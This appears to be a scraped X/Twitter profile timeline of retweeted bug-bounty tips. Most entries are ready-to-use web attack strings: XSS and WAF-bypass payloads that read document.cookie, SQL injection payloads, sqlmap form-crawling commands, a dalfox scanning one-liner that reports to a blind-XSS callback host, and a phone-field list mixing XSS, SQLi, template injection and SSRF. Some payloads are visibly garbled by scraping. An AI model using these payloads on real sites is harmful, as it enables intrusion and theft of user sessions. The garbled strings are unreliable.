Nithin 🦹‍♂️

Nithin 🦹‍♂️

178 Photos and videos

Tweets

dds retweeted

Nithin 🦹‍♂️

@thebinarybot

7 Feb 2024

💥 Last week I posted a huge thread on Dalfox usage to find XSS vulnerabilities at scale. At the end I also promised to post a list of one-liner commands to help you out. As promised, here's a list of 6( 1) simple Dalfox one-liner commands to help you find bugs faster 👇

10,092

Hacking Articles

dds retweeted

Hacking Articles

@hackinarticles

31 Oct 2023

Git Dorks for Finding Files Credit @therceman #infosec #cybersecurity #pentesting #redteam #informationsecurity #CyberSec #networking #networksecurity #infosecurity #cyberattacks #security #linux #cybersecurityawareness #bugbounty #bugbountytips

7,211

Elb

dds retweeted

Elb @elber333

1 Sep 2023

26 Chars XSS: /?xss=<svg/onload=eval(`'` URL)>#';alert(document.domain) #BugBounty #bugbountytip #xss

127

8,747

VIEH Group

dds retweeted

VIEH Group

@viehgroup

9 Aug 2023

WAF bypasses XSS payload in JSON Payload: ["');alert('XSS');//"]@xyz.xxx Post Credit: Paventhan parthibanbabu #bugbounty #bugbountytips #infosec #cybersecurity #hacking #hacker

251

16,691

Will Gates

dds retweeted

Will Gates @WllGates

8 Aug 2023

add this XSS payload for your list url=javascript:alert(document.domain) credit: @GodfatherOrwa #bugbountytips #bugbountytip Happy Hunting

350

19,489

Dark Web Intelligence

dds retweeted

Dark Web Intelligence

@DailyDarkWeb

19 Jul 2023

AllForOne - Nuclei Template Collector This repository contains a Python script that allows bug bounty hunters and security researchers to collect all Nuclei YAML templates from various public repositories. github.com/AggressiveUser/Al… #infosec #bugbounty

159

20,575

X

dds retweeted

@TheMsterDoctor1

6 Jul 2023

XSS to SQL injection parameter reflect Payload: p='<00 foo="<h1>">HTML</00>-- / SQLMAP injection: "p=<00 foo="<h1>">HTML*</00>" #BugBounty #bugbountytips #sqlinjection #xss #BugHunter

116

7,975

🇪🇨🍫

dds retweeted

🇪🇨🍫@bxmbn

1 Jul 2023

While testing for CVE-2023-24488 I found various servers behind Akamai and since the original payload gives a Forbidden response I found this bypass: post_logout_redirect_uri=

265

1,070

83,133

Kullai⚡️

dds retweeted

Kullai⚡️@Kullai12

29 Jun 2023

Swag received from @reliancejio #hacking #bugbounty #bigcompaniesgivesswags #BugBounty

4,570

dds

dds @dds46162

4 Jun 2023

RT @Kullai12: P2 on @Bugcrowd 🙂 Hunting very less these times :( >> CVE-2019-10092 Apache HTTP Server <=2.4.39 - HTML Injection/Partial Cr…

Maham Farizul

dds retweeted

Maham Farizul @0xmahamsec

29 May 2023

SQL Injectjon for Contact/Registration Forms . 1. sqlmap -u target.com/registration --dbs --forms --crawl=2 2. it will crawl all the links having input field 3. select the parameter you want to test #cybsersecurity #bughunting #bugbounty #bugbountytips #infosec

177

619

70,475

Hossein NafisiAsl

dds retweeted

Hossein NafisiAsl @MeAsHacker_HNA

29 May 2023

How I discovered XSS via triple URL encode 🕵🏻‍♂️ "><svg onload=confirm(‘XSS’)> ---> Nothing but 3 times encode was worked 🤯😂 final paylaod: ">

299

18,545

Bug Hunty

dds retweeted

Bug Hunty @bughunty

19 May 2023

Imperva Waf XSS ByPass Payload : «sVg OnPointerEnter= "location= lavas cript:ale 'rt%2 '81%2° 9%//</div"> #bugbounty #bugbountytips #cybersecurity #pentesting #hacking

6,590

N$🌟

dds retweeted

N$🌟

@__nav1n_

12 May 2023

Found an interesting #XSS where I inject the payload within the image file name and got the alert!. Payload: "12345-abc-1-23456<scr<script>ipt>alert(document.cookie)</scr<script>ipt>.img" 12345-abc-1-23456.img ==> Image name. #bugbountytip #BugBounty

176

639

40,840

0xblackbird

dds retweeted

0xblackbird @0xblackbird

11 May 2023

If you found an injection point but can't get an XSS because a WAF is blocking you Leverage loaded technologies to still execute XSS: BLOCKED: "><a href=javascript:alert(1)>accept</a> ALLOWED: xyz"/ng-click="constructor.constructor('alert(1)')() #bugbounty #bugbountytip

111

319

23,978

Shawar Khan

dds retweeted

Shawar Khan @ShawarkOFFICIAL

9 May 2023

XSS WAF Bypass using location concatenation: By Shawar Khan @ShawarkOFFICIAL Payload: "><BODy onbeforescriptexecute="x1='cookie';c=')';b='a';location='jav' b 'script:con' 'fir\u006d(' 'document' '.' x1 c"> #bugbounty #bugbountytips #xss #xssbypass

230

19,023

/Zer0/

dds retweeted

/Zer0/@_Zer0Sec_

9 May 2023

Some recent lessons learned: If something is suspicious but SQLMap “thinks” it might/might not be vulnerable, manually confirm/deny before leaving. Payload example: ' AND extractvalue(rand(),concat(0x3a,(SELECT user()))) # #bugbountytips #BugBounty

153

518

48,729

Nihad

dds retweeted

Nihad @Nihad_rekany

5 May 2023

My SQLi is duplicate 🥲 Payload = al' (select*from(select(sleep(5)))a) ' #bugbountytips #BugBounty

214

16,522

🐞Sara Badran

dds retweeted

🐞Sara Badran @SaraBadran18

4 May 2023

Oneliner XSS at scale cat domainlist.txt | subfinder | dnsx | waybackurl | egrep -iv "\.(jpg|jpeg|gif|css|tif|tiff|png|ttf|woff|woff2|ico|pdf|svg|txt|js)" | uro | dalfox pipe -b your.xss.ht -o xss.txt -- Happy hunting 🔥🔥🔥 #bugbountytips #BugBounty #bugbountytip

187

12,495

Ninad Mishra

dds retweeted

Ninad Mishra

@NinadMishra5

3 May 2023

Payloads to try on phone number input fields by @securinti XSs 441134960000;phone-context=<script>alert(0)</script> Parameter pollution (1) 441134960000;phone-context=&phone-context= 442.. Parameter pollution (2) 441134960000;ext=1;ext=? SQL injection 441134960000;phone-context=' OR 1=1; -- Template injection 441134960000;phone-context={{22}}[ [33]]{{77}}{% debug %} {77}{7*’7} SSRF 441134960000;phone-context=burocoaborator.net #BugBounty #bugbountytips #Payload

157

361

17,119